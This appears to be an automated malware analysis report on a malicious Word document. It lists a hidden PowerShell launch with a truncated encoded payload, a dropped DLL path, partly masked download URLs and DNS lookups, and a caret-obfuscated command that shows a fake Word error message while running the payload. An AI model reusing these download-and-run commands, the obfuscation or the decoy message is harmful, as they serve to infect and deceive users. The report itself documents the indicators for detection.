Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzA...
- %HOMEPATH%\nk2duhb\gxlh9ia\e6_r.dll
- %HOMEPATH%\nk2duhb\gxlh9ia\e6_r.dll
- 'bh###ivrind.com':80
- 'va####abhargave.com':80
- 'le#####pareonline.com':80
- 'ca######historia.growlab.es':80
- http://bh###ivrind.com/cgi-bin/JBbb8/
- http://va####abhargave.com/asset/W9o/
- http://www.le#####pareonline.com/de.letscompareonline.com/wYd/
- http://ca######historia.growlab.es/wp-content/hGhY2/
- DNS ASK ca#.#ykfn.com
- DNS ASK bh###ivrind.com
- DNS ASK va####abhargave.com
- DNS ASK ie##est.net
- DNS ASK go###ongthe.com
- DNS ASK le#####pareonline.com
- DNS ASK ca######historia.growlab.es
- '<SYSTEM32>\cmd.exe' cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAe...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.